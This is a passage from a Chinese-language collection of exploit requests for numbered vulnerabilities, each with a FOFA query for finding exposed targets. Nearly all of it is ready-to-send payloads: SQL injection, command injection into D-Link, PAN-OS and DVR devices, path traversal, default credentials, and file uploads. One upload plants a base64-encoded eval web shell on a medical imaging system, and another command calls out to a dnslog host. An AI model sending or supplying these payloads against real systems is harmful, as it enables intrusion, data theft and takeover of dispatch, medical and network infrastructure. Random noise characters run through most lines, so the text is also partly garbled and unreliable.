, X6 M1 ~9 o. n' EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ S9 Q% y' q/ l+ `" m
Accept-Encoding: gzip, deflate, br
$ Q, f! U) t: U; u9 {Connection: close
7 P; }( S# h' \1 \Upgrade-Insecure-Requests: 1
2 a% G4 ?: K) u0 s4 ], V8 t4 h, T4 a2 v# l7 A
9 V4 h8 D: X+ T7 C4 r
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* q: x/ {! A# Z8 n3 iCVE-2024-26226 {/ E/ @# S- P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
' N; g- r( F* V& |: Z; TGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
3 B) ^8 }( R" I7 H/ pHost: x.x.x.x
7 H( L" p; w/ C7 x; ?; IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" o. @' s2 R4 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 z+ u0 G3 Y6 l+ ?$ f+ l$ \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; h7 b" E* r( B
Accept-Encoding: gzip, deflate, br
9 U) }* L. y. ?- O) [3 F. }Connection: close: W! N. b$ H" Q! ]8 b* U3 L
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
% Q0 M' |8 c+ {0 fUpgrade-Insecure-Requests: 1
! j" R1 _: k- i3 q, P! Y. l% y4 A* U$ [$ R0 N

# `+ x/ v/ D4 B$ @140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
3 ^+ l" I& M+ W+ z, [CVE-2024-2566- B/ U8 e) T: [( u  Y
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 Q" a; z2 P$ A
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.19 [4 R8 _; n. z% E/ j
Host: x.x.x.x
. s0 K4 T3 J- [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% p  K+ g3 B/ ?: [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 z8 ?2 [/ U- g" {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( g1 d) ]* w8 l3 |# r7 A1 d! sAccept-Encoding: gzip, deflate, br
3 A* ~8 [6 T8 }# SConnection: close% _0 ?/ M! C. u( ]
Cookie: authcode=h8g9
# y, S4 ^+ h4 t! I. ?3 ]* n( t5 d' eUpgrade-Insecure-Requests: 1. Y9 {" S  a6 ?, o% [

6 z$ w! t' u" e7 D# ]1 d7 q! \
5 l4 c7 c$ e* s! D6 t3 s141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
0 i6 {4 O2 V& t' L; _6 ]7 r" ~FOFA:body="指挥调度管理平台"
- X% ?' e+ y! a0 {: W0 p7 ?POST /app/ext/ajax_users.php HTTP/1.1
9 O9 m7 `: ~$ Q/ K9 ~# iHost: your-ip
& X4 M+ C0 O" L7 z7 yUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info2 p% o- k8 M! n9 O8 ?4 e* F
Content-Type: application/x-www-form-urlencoded6 r" L- M1 h* f- B: q

* T/ b  L$ {( Q4 i. p4 ]4 g& j. U; g0 h* \# B
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -' V( h7 t7 I2 L8 i. T$ j

& k" r5 a: m3 {/ n3 W& i4 P2 m
& L" w# n/ L, E9 f5 U142. CMSV6车辆监控平台系统中存在弱密码
( h. F* I6 w: l$ \; lCVE-2024-29666# ^# `  N$ K& s. w9 @
FOFA:body="/808gps/"7 n. ^: O: E" b5 c  |1 S: d. u
admin/admin
: w" A5 f! Z7 M: j+ Z! [143. Netis WF2780 v2.1.40144 远程命令执行$ V' R3 y* n5 O
CVE-2024-25850, \8 g# I! w; S/ }1 d
FOFA:title='AP setup' && header='netis'$ G8 `; S9 z) Q5 W
PAYLOAD
$ t" O4 C2 ~& L0 r, Q2 _/ c
6 Y# M( t7 ~! X" f8 m! |5 w144. D-Link nas_sharing.cgi 命令注入
; M3 R+ I' H3 _' q( R* L5 QFOFA:app="D_Link-DNS-ShareCenter") x* X% S& F4 m2 m
system参数用于传要执行的命令
3 v) F+ b0 K# cGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
, Z! G0 v* X; _5 O( x7 }1 ^# H3 ZHost: x.x.x.x
% ], f, x. N6 \$ Z; Z6 jUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
( I: ^) P: H; ?, QConnection: close
8 a  A6 D' P/ E& fAccept: */*+ `) q9 T" u5 p* e  c8 f# ~
Accept-Language: en
& K! Z/ x; R  f& X( H' r6 DAccept-Encoding: gzip. j" P6 X/ V9 T5 f
% U( c* e4 t6 g
4 X  ^* d3 Y# s/ S- A
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
* {0 P- X! C6 m; G0 q5 t  dCVE-2024-3400
8 Z: V2 G, x" SFOFA:icon_hash="-631559155"6 B' A$ b7 ^# m1 H6 f3 X/ r
GET /global-protect/login.esp HTTP/1.1
& I+ d3 b9 M+ m; vHost: 192.168.30.112:1005
! v0 E) |2 b; Z7 b  ]( j; rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
2 t1 n* Q2 P% gConnection: close
" E- _) x8 N  d- ^0 d2 I3 y+ MCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;' R/ _9 R9 K7 _9 h5 |- t8 [7 h
Accept-Encoding: gzip) n; Q6 R) T8 c7 N* ^& k( W
7 W+ o/ g; A5 q( M
- @* T: Q$ {! N9 L5 w+ Z
146. MajorDoMo thumb.php 未授权远程代码执行# I% F( a* Q: `' N$ K5 X3 x
CNVD-2024-021753 e2 B8 ]& I9 A8 ]  E
FOFA:app="MajordomoSL"4 y! U  U0 I/ _8 S2 F
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
! S: J& ?# X/ VHost: x.x.x.x! E/ @4 {  P6 c9 T* o+ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: K7 U+ D1 P( }3 J* U  }3 j" w
Accept-Charset: utf-8$ s8 h, c$ |9 C2 _
Accept-Encoding: gzip, deflate
, Y- |% x2 l. L. ^Connection: close
  i6 G: L$ h. g) W. d! g% N% M+ r8 R" L- Q& [8 G. l1 [" K/ S
9 a- x& ]: I: j2 ~. u. Z4 K
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
  `! ]) z8 s% j- N& z, m: tCVE-2024-32399
* ?% _+ o  z' I" l4 i# m5 n1 J4 ^! a. \FOFA:body="RaidenMAILD"
6 @# j9 f# a$ `/ y9 O$ z$ K# \0 jGET /webeditor/../../../windows/win.ini HTTP/1.1
$ n/ O- ~6 z: ~. ~! W7 r( H; gHost: 127.0.0.1:81
2 V& F3 y" j" ?  O  }Cache-Control: max-age=0
( n, c- w0 \) p% K2 MConnection: close
' O/ c. J9 i4 ]; S1 O2 `! C; t
& K* R* @6 c$ b- \1 C! f! L: N2 z* n: C6 n9 \3 r9 P
148. CrushFTP 认证绕过模板注入6 w6 @  k5 @" M* u1 \. b
CVE-2024-4040
3 C% v# n) b: HFOFA:body="CrushFTP", x' }2 f0 x: g) h/ [, c
PAYLOAD
, }; o3 [) ~4 A, Z) S3 N
, i  N  M/ I) O0 h& b  v149. AJ-Report开源数据大屏存在远程命令执行+ |! S/ p, L: t! q0 H" c
FOFA:title="AJ-Report"
. e8 H# |' a1 z* _. g( ^3 }4 ]1 P7 v* m0 ^1 F! ]; @9 H
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
7 [) l  u7 _& t- ~3 m. N6 ?: XHost: x.x.x.x
) A- g8 _5 N9 K' Q3 l' K& Z* z* V/ G. ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 e6 C/ W. K9 k6 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 h& A8 d- A8 d2 L. ?% ~3 R# B
Accept-Encoding: gzip, deflate, br/ H2 d1 W1 ^; k4 S* w$ L# H
Accept-Language: zh-CN,zh;q=0.9
4 S! @$ [2 ?+ R2 O) L5 [$ iContent-Type: application/json;charset=UTF-8
/ c7 L* a- I3 F" D* ?: mConnection: close
5 ?) ~* ^# I- s6 f+ L  ?
. O3 r% m! ~7 o) Z- P5 x{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: i+ f) M6 ]/ D3 M: k
* G8 \# D) G" b2 y150. AJ-Report 1.4.0 认证绕过与远程代码执行
" `' T. g# {# g0 S3 k9 H5 HFOFA:title="AJ-Report"
! i# d6 N4 s5 jPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
0 u5 U& @2 \+ R! u& iHost: x.x.x.x
: D- o; w: ?- G6 m8 c) L* b$ U, wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 f' j- o: s- H( M+ p3 o. D! s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( O. ^/ l8 \5 SAccept-Encoding: gzip, deflate, br7 r  {  M) z5 F7 }- q( d5 c8 v
Accept-Language: zh-CN,zh;q=0.9
  H0 v  N4 [. C( ZContent-Type: application/json;charset=UTF-8
/ p3 Z: v5 ]( a5 xConnection: close$ a0 l6 g9 Y  z# I7 c/ [* g# K
Content-Length: 339
( ~) b- x' _9 v6 q/ Q9 D
# i1 Z1 y2 b4 @9 R{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 x/ ~0 e( @+ R3 j' x2 j- z1 a
, n5 m' q/ _- f3 N8 e, v8 P( b3 U
* c$ ^: l1 O( J% k151. AJ-Report 1.4.1 pageList sql注入! r9 [: A) w# J: z& m( _
FOFA:title="AJ-Report"
& G  S  ]- k% t5 L, u. SGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.13 j+ F. Z5 g& S& P; j+ K
Host: x.x.x.x0 Z: D3 W( F! z% u  ]7 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ H& d  [2 N/ n4 e; UConnection: close: ?7 [5 B( k0 w" _# L- W1 G( h
Accept-Encoding: gzip1 q: o" B3 ^! M5 L4 @9 h

1 _5 s( }- W9 b3 \
- C% z( ?( t! s* g; x152. Progress Kemp LoadMaster 远程命令执行
# U+ B/ ?; E! X3 _) N# zCVE-2024-1212
: u# ~' D$ k: }0 _* VLoadMaster <= 7.2.59.2 (GA)2 w9 D5 t1 v/ j" J3 c$ q/ |( q0 l
LoadMaster<=7.2.54.8 (LTSF), i% ^( N: Z. E* \
LoadMaster <= 7.2.48.10 (LTS)
3 S& z- s. M, D; h0 L6 L* i' [FOFA:body="LoadMaster"/ b5 `- a. ]6 H" ]6 V
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码+ _( Q8 F5 E1 D
GET /access/set?param=enableapi&value=1 HTTP/1.1
4 R3 o  T2 M' o6 t* Z- [Host: x.x.x.x* @* @+ p+ j2 y4 K8 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
  ^7 O0 G" [$ T  Q0 n. K! kConnection: close& s" H' R  D- R) p/ p/ d
Accept: */*
+ t/ ?) i8 O2 ?* p+ N( BAccept-Language: en
4 T* ?; @' F  u, z8 a* n6 v7 rAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
! x) c- _1 {4 |6 g' DAccept-Encoding: gzip
# S" _3 V$ V8 m2 @* N
% Q, e' E; U% O4 K5 e* Z* Z/ ]7 K. b, i& x
153. gradio任意文件读取+ c/ h5 g' R3 c% A
CVE-2024-1561FOFA:body="__gradio_mode__"; V# p8 i  R# M) [* |+ p. p7 i
第一步,请求/config文件获取componets的id/ {" X+ g8 O+ `9 a8 H
http://x.x.x.x/config. M$ q& m  ~' Q  U* ?
7 R7 Y- s/ g: @
6 U% S7 s7 ?6 n$ s* `0 f6 e
第二步,将/etc/passwd的内容写入到一个临时文件8 ]& C9 ^: i& N: l- j: H
POST /component_server HTTP/1.1) k# R5 ^, c2 Y! \( D
Host: x.x.x.x2 W& D% \( d6 a: y1 y- H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
- O6 [# M4 e8 Y& h9 x3 D, eConnection: close4 r3 M2 N4 r# q- `! [% d! x; |
Content-Length: 1153 v6 [. z' T" K; Z) v
Content-Type: application/json+ T; o. m3 _5 l* G) B0 A
Accept-Encoding: gzip
& H. f% J1 W1 F- i7 N5 d# L
% ~- I6 I+ }5 _5 Z+ g{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}! v0 k& X5 i6 Z# E9 J

1 f2 C, H' q3 f' N1 C
3 h1 x4 j3 u$ K+ x第三步访问4 b3 P1 ~3 s+ q, l; [
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd, X' F5 G- @' r+ y; C7 W5 G4 k

, d/ i, g" G4 x" j# S/ s) z+ i/ i5 V
+ P6 d* \/ Q) B; f154. 天维尔消防救援作战调度平台 SQL注入
/ S2 ~4 H" n8 i" c$ hCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
2 m  `9 U: A2 f# t  @POST /twms-service-mfs/mfsNotice/page HTTP/1.18 }3 F( C/ M! d. u
Host: x.x.x.x* j1 n- o4 s* E& n# U& l+ O$ g# e& N
Content-Length: 1064 _+ {" y* m; j+ e& ^: b8 l
Cache-Control: max-age=0. @. h, H+ i' a/ Y+ R5 g
Upgrade-Insecure-Requests: 1
4 j( C+ Z) o4 H: `+ ]) c, DOrigin: http://x.x.x.x
" h$ J# i9 ?0 u9 PContent-Type: application/json8 n2 R/ |. ~: [7 {. w0 ]6 t7 F9 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
- U2 p1 n6 z0 ]/ Z" Y% ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ j7 m; v$ A" y: Z
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page$ s" s: V, Y6 _- ^3 @, L" `
Accept-Encoding: gzip, deflate
/ e$ y  h) d3 Q* h/ o% FAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
* `/ c  E0 Q! C# t' HConnection: close; C& h/ D# @: L! @& y
  G2 l3 L2 B% X& Y2 P$ C, v- R
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}7 P' [& m& r  `3 T: s* ~
$ Z# V  v5 y; S7 W4 @

# f1 ?: {6 A2 t1 z- y( ?: [155. 六零导航页 file.php 任意文件上传
/ z5 k( p! e0 z- U# eCVE-2024-34982
( K2 u* I8 m! g1 V* j0 ]$ PFOFA:title=="上网导航 - LyLme Spage"
( E" |5 }9 D* S4 {% qPOST /include/file.php HTTP/1.1! d4 a5 \& K: m
Host: x.x.x.x$ Q3 q$ L0 U. Q) z9 S0 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 i% h. V$ d, t0 l6 W7 Z; l# IConnection: close1 @* d$ G- l. G9 b7 b# I
Content-Length: 232
; {& V# q3 ~% g& k& t% U; l( @Accept: application/json, text/javascript, */*; q=0.01
- N& }# B& a/ V8 N, i* VAccept-Encoding: gzip, deflate, br
, j- O; y2 Z' X5 ~! w+ \+ RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 T  w3 C3 |+ P/ }
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
( T, E) n5 ^7 @1 wX-Requested-With: XMLHttpRequest* W1 W( y& }/ e8 I
3 x$ g! c9 E& V: ]' U
-----------------------------qttl7vemrsold314zg0f6 W1 M% e' \2 k0 k, g; x
Content-Disposition: form-data; name="file"; filename="test.php". i) v. j% g0 H6 I' l4 O% |0 G5 s
Content-Type: image/png
) F1 l* R( W$ w& e3 V* Z7 D3 b1 X! c% g0 m* }
<?php phpinfo();unlink(__FILE__);?>
$ I9 r! \0 s& Y' f-----------------------------qttl7vemrsold314zg0f--
9 f9 _: J3 u+ x3 L( p& g4 Y- b# o- a! S# c; [
- d( r/ h& L5 @
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php! J1 L! q. r( l5 B) o5 Q* I! M

" A) c9 s- e4 R" K. t: l* v156. TBK DVR-4104/DVR-4216 操作系统命令注入* U: A- Q" m+ _5 Y! i$ v
CVE-2024-3721
$ M+ j3 G% R2 E; c9 h; Z4 U3 fFOFA:"Location: /login.rsp"
# L5 D! D8 Z# g·TBK DVR-4104
8 ^3 X& R4 |* @. D+ g# G" ]·TBK DVR-4216
$ x9 P4 k# s: ?/ D4 k! M! Icurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
; C# _8 P( s3 x9 t3 a" w8 n
* Q) D* u' C# A' ]/ ?$ B  `5 H$ f0 ?3 l" a' x
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
3 ~8 E3 V$ v" S) J7 iHost: x.x.x.x
* O6 q; B$ R: V0 S+ sUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# E4 N, J) K6 o: @0 uConnection: close
; ~5 y$ r, @! B8 N$ t/ BContent-Length: 0
( N% F4 `- n$ `( a* }# a5 _: OCookie: uid=1
  t8 F' K; S# d% WAccept-Encoding: gzip) s( N" y" M  E* H7 k8 B

* q- v8 U' r% v* P( V: v( J# J$ x
- _) K3 K3 _2 w& ?157. 美特CRM upload.jsp 任意文件上传; G4 o* B1 w* s8 V+ v$ ?3 ]
CNVD-2023-06971* N  R, P4 U  c. _0 }' O
FOFA:body="/common/scripts/basic.js"
8 O) }* Z. ?$ A/ F3 k. OPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
  a5 b2 Q) Y- i/ ]6 UHost: x.x.x.x
7 \1 p% Z, j7 A5 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: F2 z. r% j+ Z% B3 y
Content-Length: 709
8 u2 G% `; J7 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 D! V( u5 n* R1 t
Accept-Encoding: gzip, deflate/ h2 L6 e+ A, |+ w8 x$ n; \4 K
Accept-Language: zh-CN,zh;q=0.9
" q8 ?, T: l( aCache-Control: max-age=0
/ S8 L" W  x) mConnection: close- l' E! Q4 v5 j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
. r7 E( R7 |, `4 u% EUpgrade-Insecure-Requests: 1
1 @. U1 y! p0 |( E0 b  i) @, n' r/ A( O2 [- Q
------WebKitFormBoundary1imovELzPsfzp5dN
% I8 }* e% [, U' u: p3 TContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"; w7 t# }* y! b; b& P7 W; F9 x  H
Content-Type: application/octet-stream' G& S0 d5 V4 l2 U+ V: e

9 q/ t5 I: u# W4 L1 Gnyhelxrutzwhrsvsrafb) k! g! o8 m8 q( s. B* `
------WebKitFormBoundary1imovELzPsfzp5dN
7 u; I& _6 H8 X, ?* SContent-Disposition: form-data; name="key"
7 O- t5 A6 J# G# n
( d) k1 H1 q/ Q3 Y# [null# l6 N) T+ d' D, m- {
------WebKitFormBoundary1imovELzPsfzp5dN' f5 A% l* E! V, ]8 Z7 @
Content-Disposition: form-data; name="form"* B6 j8 X8 d" }. m1 |

! r9 T# v8 z9 Q( jnull3 D7 X; g4 s0 S0 W% W# O
------WebKitFormBoundary1imovELzPsfzp5dN! t' e( E# Q7 _% M
Content-Disposition: form-data; name="field"& I; L3 {8 ~- J: e2 u& |" P  J2 H

4 L9 M( I! b5 r! v, Z$ r( d! L: Pnull
/ N, G7 k: f5 P/ W0 O------WebKitFormBoundary1imovELzPsfzp5dN
- D' v! \; y) S. x/ Z7 vContent-Disposition: form-data; name="filetitile"
  E( Y+ i% O4 X0 c4 o# g0 p1 {9 E! J% M* W8 ^. ~# U$ R
null+ H  q* p3 Q5 b' ]2 |/ I) u
------WebKitFormBoundary1imovELzPsfzp5dN
( H4 ^9 `1 B+ V2 y! B) lContent-Disposition: form-data; name="filefolder"2 `: T7 \7 P8 r& m* O' L7 O( p
! K6 n) M3 K* r6 O+ t
null
7 k" X0 _$ e% n- ]# q; Q; t------WebKitFormBoundary1imovELzPsfzp5dN--& e5 k6 R" Q1 J9 S: {; _
% Y2 a$ Q& Z* e& Z2 [1 H: a

0 `- J, u7 o6 j% A9 N% }' r" o2 Thttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp) }) L: K6 Z6 ~/ O# O
- ]. r9 T7 S4 I2 x8 F3 {
158. Mura-CMS-processAsyncObject存在SQL注入1 o' Z! O! S. r' T% f  v
CVE-2024-32640
- ^) [  O; r% y# xFOFA:"Generator: Masa CMS"
) `9 T2 \$ H/ a% |2 K. m& W% J, ~, mPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.10 k1 p1 _! C# c1 D# k4 Q" a1 b
Host: {{Hostname}}  F$ V  \8 @' U" w
Content-Type: application/x-www-form-urlencoded
; N  |8 g( @: x" c& i, k/ V# L
# {0 L6 J7 b1 n/ c) Z1 J& F) Nobject=displayregion&contenthistid=x\'&previewid=1  H: ?; `; h2 d! Z
! \$ l. c1 E, p& o0 F
: j7 w' F) o( E! Z
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
$ H% k% F% ~! wFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")  H& S' D, \$ D/ f/ w6 _8 U
POST /webservices/WebJobUpload.asmx HTTP/1.1: v* f3 I0 m' j% m& ^9 z
Host: x.x.x.x
  o, _$ u1 q# M5 }. M2 ^& wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.366 E; O( c( E) ]) H
Content-Length: 1080/ I, o7 N  Q4 U& _  T
Accept-Encoding: gzip, deflate
0 I  ?1 I6 {& R* v$ p& CConnection: close% n% G8 p; B9 K
Content-Type: text/xml; charset=utf-8( b9 Q1 s% h& A5 J: {, C& y7 t
Soapaction: "http://rainier/jobUpload"
9 e: m: b2 E  S7 r* \- A( d
6 c' f. H" w# f& h<?xml version="1.0" encoding="utf-8"?>
+ b5 [6 @$ N) Y* \<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 m9 B- P( t4 m  L& H9 u" N<soap:Body>& a4 V6 U% }) }  L5 k! _" R
<jobUpload xmlns="http://rainier">/ H) M  Z# g! s# C  m, E! H# D
<vcode>1</vcode>
2 `! d3 _, J& M7 J<subFolder></subFolder>, q8 l& O; Z7 m
<fileName>abcrce.asmx</fileName>& e" y% U5 R3 o  B
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
6 {" i4 C# _! q- l& H- q</jobUpload>( S' }3 V5 ~  T8 t9 [4 f/ M6 }
</soap:Body>
, \: u" X. D& P8 U</soap:Envelope>
* c' _1 U9 D: S9 X/ N( K! Y" B" Z. ^! e; S- Y

" }$ A3 W2 \( r% J- e& ?/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
# ~) I& A' R, M
9 Y' y) I+ a! g
7 v9 w9 c& j: [% }2 ~  q. C8 T160. Sonatype Nexus Repository 3目录遍历与文件读取) a3 N" Q2 J  S: h) q
CVE-2024-4956) v( a( t; Z9 }+ ?0 m
FOFA:title="Nexus Repository Manager"6 T, A/ O1 N, M5 ?7 g% }! L5 n
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
' I9 {, N# x8 c  D8 @9 C+ I* `Host: x.x.x.x
1 |% e4 j# {' {9 G" O7 bUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
8 K! l' h: u) x; LConnection: close8 x! V  ~5 ^; @9 H; N
Accept: */*
7 l! R7 \4 j% b/ QAccept-Language: en" z+ ?0 [8 J# W" [; }3 m. m
Accept-Encoding: gzip9 I- f. ]& U1 d9 ]8 {

( e  F: F  F9 C) s0 c- @& d2 u
+ ?7 c9 r0 I8 T: ]: H# u7 R& }" P161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
! v( `  S5 Q7 }+ K0 G8 m. e" \FOFA:body="/KT_Css/qd_defaul.css"
: G: F5 H8 C2 ]* R  S% Z, ]4 Z第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密1 M, n( V1 }8 y1 J& }; F
POST /Webservice.asmx HTTP/1.1% c5 i6 v0 f& u
Host: x.x.x.x
3 S& O/ D/ V0 r/ L1 V2 i  l6 q) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
3 Z5 L9 i* L5 @- ]- Z: [0 EConnection: close4 U) C; N7 j3 z% @7 f/ {
Content-Length: 445
